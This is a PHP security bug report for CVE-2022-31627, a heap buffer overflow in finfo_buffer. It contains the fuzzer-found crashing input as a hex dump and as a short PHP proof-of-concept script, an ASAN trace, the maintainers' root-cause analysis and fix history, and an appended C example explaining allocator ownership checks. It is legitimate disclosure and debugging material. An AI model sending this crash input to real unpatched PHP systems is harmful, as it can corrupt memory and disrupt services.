Sec Bug #81723 Heap buffer overflow in finfo_buffer
Submitted: 2022-06-27 22:59 UTC Modified: 2022-07-05 07:05 UTC
From: xd4rker at gmail dot com Assigned: stas (profile)
Status: Closed Package: Filesystem function related
PHP Version: 8.1.7 OS: Linux
Private report: No CVE-ID: 2022-31627
 [2022-06-27 22:59 UTC] xd4rker at gmail dot com
Description:
------------
The following content is causing a heap-based buffer overflow in finfo_buffer. This was found using AFL++.

00000000  00 01 8a 75 70 00 10 97  db 97 97 98 97 97 7d 87  |...up.........}.|
00000010  97 97 97 00 00 92 00 1f  00 51 00 00 00 00 00 00  |.........Q......|
00000020  00 00 00 ff ff 7f ff 00  00 00 00 00 1e 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 0c 00 00 00 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  dc 00 00 00 01 00 00 00  |................|
00000050  00 00 00 00 00 4f 01 19  00 00 7f 00 00 00 00 00  |.....O..........|
00000060  18 00 39 00 00 00 00 00  00 00 00 00 00 00 00 00  |..9.............|
00000070  00 00 dc 00 00 00 01 00  00 00 00 00 00 00 00 4f  |...............O|
00000080  01 19 00 00 7f 00 00 f5  00 00 00 00 ee ff 00 00  |................|
00000090  00 00 00 00 00 00 01 00  00 fd 00                 |...........|

Tested against PHP >= 8.1.

ASAN output:

==4777==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e000000000 at pc 0x000000faba20 bp 0x7ffc087ab460 sp 0x7ffc087ab458
READ of size 8 at 0x60e000000000 thread T0
    #0 0xfaba1f in zend_mm_realloc_heap /home/user/php-src/Zend/zend_alloc.c:1561:3
    #1 0xfaba1f in _erealloc /home/user/php-src/Zend/zend_alloc.c:2582:9
    #2 0xa94368 in file_check_mem /home/user/php-src/ext/fileinfo/libmagic/funcs.c:623:14
    #3 0xa9f566 in match /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:458:9
    #4 0xaa2748 in file_softmagic /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:138:13
    #5 0xaa2748 in mget /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:1836:8
    #6 0xa9f04c in match /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:360:12
    #7 0xaa49b2 in mget /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:1885:8
    #8 0xa9f04c in match /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:360:12
    #9 0xa9e37e in file_softmagic /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:138:13
    #10 0xa93762 in file_buffer /home/user/php-src/ext/fileinfo/libmagic/funcs.c:459:7
    #11 0xa98c42 in magic_buffer /home/user/php-src/ext/fileinfo/libmagic/magic.c:273:6
    #12 0xa6eb87 in _php_finfo_get_type /home/user/php-src/ext/fileinfo/fileinfo.c:346:23
    #13 0x12947cd in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/user/php-src/Zend/zend_vm_execute.h:1250:2
    #14 0x114f0a9 in execute_ex /home/user/php-src/Zend/zend_vm_execute.h:55687:7
    #15 0x114f93c in zend_execute /home/user/php-src/Zend/zend_vm_execute.h:60251:2
    #16 0x1071860 in zend_eval_stringl /home/user/php-src/Zend/zend_execute_API.c:1271:4
    #17 0x1071e15 in zend_eval_stringl_ex /home/user/php-src/Zend/zend_execute_API.c:1313:11
    #18 0x1071e15 in zend_eval_string_ex /home/user/php-src/Zend/zend_execute_API.c:1323:9
    #19 0x153f8ff in do_cli /home/user/php-src/sapi/cli/php_cli.c:998:5
    #20 0x153dae0 in main /home/user/php-src/sapi/cli/php_cli.c:1336:18
    #21 0x7f612802e082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
    #22 0x602b6d in _start (/home/user/php-src-8.1/sapi/cli/php+0x602b6d)

0x60e000000000 is located 64 bytes to the left of 154-byte region [0x60e000000040,0x60e0000000da)
allocated by thread T0 here:
    #0 0x667654 in strdup (/home/user/php-src-8.1/sapi/cli/php+0x667654)
    #1 0x15595a7 in save_ps_args /home/user/php-src/sapi/cli/ps_title.c:195:30

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/user/php-src/Zend/zend_alloc.c:1561:3 in zend_mm_realloc_heap
Shadow bytes around the buggy address:
  0x0c1c7fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1c7fff8000:[fa]fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1c7fff8010: 00 00 00 00 00 00 00 00 00 00 00 02 fa fa fa fa
  0x0c1c7fff8020: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff8030: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c1c7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff8050: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==4777==ABORTING

Test script:
---------------
<?php

// Reporter's PoC: the hex dump from the description as a binary string.
$data = hex2bin("00018a7570001097db97979897977d87979797000092001f0051000000000000000000ffff7fff00000000001e0000000000000000000000000c0000000000000000000000000000dc0000000100000000000000004f011900007f0000000000180039000000000000000000000000000000dc0000000100000000000000004f011900007f0000f500000000eeff0000000000000000010000fd00");

// Default magic database and flags; the overflow is reached from libmagic's
// file_check_mem() via erealloc(), as the ASAN trace above shows.
$f = finfo_open();
finfo_buffer($f, $data);

Expected result:
----------------
MacBinary, total length 256, Mon Feb  6 06:28:16 2040 INVALID date, modified Fri Feb 24 11:23:37 2040, creator '    ', 20225 bytes "\212" , at 0x4f81 419430527 bytes resource

Actual result:
--------------
zend_mm_heap corrupted

History
 [2022-06-28 15:13 UTC] cmb@php.net
-Package: *Graphics related +Package: Filesystem function related -Assigned To: +Assigned To: cmb
 [2022-06-28 15:13 UTC] cmb@php.net
I can confirm the memory corruption, but that looks like a
libmagic issue (which may have been fixed in the meantime).
 [2022-06-30 14:54 UTC] cmb@php.net
-Status: Assigned +Status: Analyzed
 [2022-06-30 14:54 UTC] cmb@php.net
No, this is not an upstream issue, but rather caused by a bad
patch of libmagic 5.40 and affects PHP-8.1+; we try to
`erealloc()` memory which has been `malloc()`d.
 [2022-06-30 15:32 UTC] cmb@php.net
Proposed patch: <https://gist.github.com/cmb69/90aba3c8ff8d42c5598e31846d259aa7>.
This includes updates to libmagic.patch, created by running ./generate_patch.sh.

Stas, can you please handle this?
 [2022-06-30 15:37 UTC] cmb@php.net
-Assigned To: cmb +Assigned To: stas
 [2022-06-30 22:13 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2022-07-05 06:37 UTC] stas@php.net
-CVE-ID: needed +CVE-ID: 2022-31627
 [2022-07-05 07:05 UTC] git@php.net
Automatic comment on behalf of cmb69 (author) and smalyshev (committer)
Revision: https://github.com/php/php-src/commit/ca6d511fa54b34d5b75bf120a86482a1b9e1e686
Log: Fix #81723: Memory corruption in finfo_buffer()
 [2022-07-05 07:05 UTC] git@php.net
-Status: Analyzed +Status: Closed
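The root cause cmb identifies above (a PHP-specific libmagic 5.40 patch passing a malloc()'d buffer to erealloc()) explains the ASAN report: the 8-byte READ is inside zend_mm_realloc_heap, i.e. the Zend allocator reading its own bookkeeping for a pointer it never handed out, and the faulting address 0x60e000000000 is chunk aligned, consistent with an allocator that locates a block's chunk header by masking the pointer. The C program below is an added example, not code from php-src or libmagic: it models a chunk-based arena with hypothetical parameters (4 KiB chunks, a 64-byte header and the names arena_*, naive_header_addr; Zend MM's real chunks are 2 MiB and its layout differs) and contrasts the naive masked header lookup with an ownership check that rejects foreign pointers before any header is touched.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Hypothetical arena parameters for this example; only the design principle
 * (find the chunk header by masking the pointer) matches Zend MM. */
#define CHUNK_SIZE  4096u
#define CHUNK_HDR   64u
#define ARENA_MAGIC 0x41524e41u   /* "ARNA" */

struct chunk {
    uint32_t magic;                  /* marks a chunk owned by this arena */
    uint32_t used;                   /* bump-pointer offset into data[] */
    uint8_t  pad[CHUNK_HDR - 8];
    uint8_t  data[CHUNK_SIZE - CHUNK_HDR];
};

static void         *arena_raw;      /* backing allocation, over-sized for alignment */
static struct chunk *arena_chunk;    /* one CHUNK_SIZE-aligned chunk is enough here */

/* Carve one aligned chunk out of a plain malloc() so no C11/POSIX aligned
 * allocation function is needed. */
static int arena_init(void) {
    if (arena_chunk) return 1;
    arena_raw = malloc(2 * CHUNK_SIZE);
    if (!arena_raw) return 0;
    uintptr_t a = ((uintptr_t)arena_raw + CHUNK_SIZE - 1) & ~(uintptr_t)(CHUNK_SIZE - 1);
    arena_chunk = (struct chunk *)a;
    arena_chunk->magic = ARENA_MAGIC;
    arena_chunk->used = 0;
    return 1;
}

/* Bump allocation, 16-byte rounded; NULL when the chunk is exhausted. */
static void *arena_alloc(size_t n) {
    n = (n + 15) & ~(size_t)15;
    if (!arena_chunk || arena_chunk->used + n > sizeof arena_chunk->data) return NULL;
    void *p = arena_chunk->data + arena_chunk->used;
    arena_chunk->used += (uint32_t)n;
    return p;
}

/* Naive lookup: trust the pointer and mask down to the chunk header. Returns
 * the address that would be read; deliberately never dereferenced, because
 * for a pointer from another allocator it is not a header at all. */
static uintptr_t naive_header_addr(const void *p) {
    return (uintptr_t)p & ~(uintptr_t)(CHUNK_SIZE - 1);
}

/* Ownership check: the pointer must lie inside the live part of a chunk we
 * allocated. This runs before any header is touched. */
static int arena_owns(const void *p) {
    if (!arena_chunk) return 0;
    uintptr_t a  = (uintptr_t)p;
    uintptr_t lo = (uintptr_t)arena_chunk->data;
    uintptr_t hi = lo + arena_chunk->used;
    return a >= lo && a < hi;
}

/* realloc that refuses foreign pointers instead of corrupting the heap. */
static void *arena_realloc(void *p, size_t old_n, size_t new_n) {
    if (p == NULL) return arena_alloc(new_n);
    if (!arena_owns(p)) return NULL;       /* malloc()'d, stack, or garbage */
    void *q = arena_alloc(new_n);
    if (q) memcpy(q, p, old_n < new_n ? old_n : new_n);
    return q;
}

/* The bug class from the report: a buffer from the system malloc() is handed
 * to the arena's realloc. Returns 1 when the arena rejects it. */
static int foreign_pointer_rejected(void) {
    char *sys = malloc(32);
    if (!sys) return 0;
    memset(sys, 'A', 32);
    int rejected = arena_realloc(sys, 32, 64) == NULL;
    free(sys);
    return rejected;
}

/* Grow an arena-owned block through the checked path; 1 if the data survived. */
static int arena_pointer_grows(void) {
    char *p = arena_alloc(16);
    if (!p) return 0;
    memcpy(p, "finfo_buffer", 13);
    char *q = arena_realloc(p, 16, 48);
    return q != NULL && memcmp(q, "finfo_buffer", 13) == 0;
}

int main(void) {
    if (!arena_init()) return 1;
    void *a = arena_alloc(16);
    char *sys = malloc(16);
    printf("arena ptr  -> header %#lx (chunk %#lx, owned=%d)\n",
           (unsigned long)naive_header_addr(a), (unsigned long)(uintptr_t)arena_chunk, arena_owns(a));
    printf("malloc ptr -> header %#lx (not a chunk, owned=%d)\n",
           (unsigned long)naive_header_addr(sys), arena_owns(sys));
    printf("foreign realloc rejected: %d\n", foreign_pointer_rejected());
    printf("arena realloc ok:         %d\n", arena_pointer_grows());
    free(sys);
    free(arena_raw);
    return 0;
}
```

The point of the contrast is that the masked lookup has no way to tell a foreign pointer from its own; it simply reads whatever sits at the computed address, which is what ASAN caught in zend_mm_realloc_heap. A real allocator cannot afford a range check on every call, which is why the fix in this bug is to keep each buffer with the allocator that created it rather than to harden erealloc().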
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Nov 21 10:01:29 2024 UTC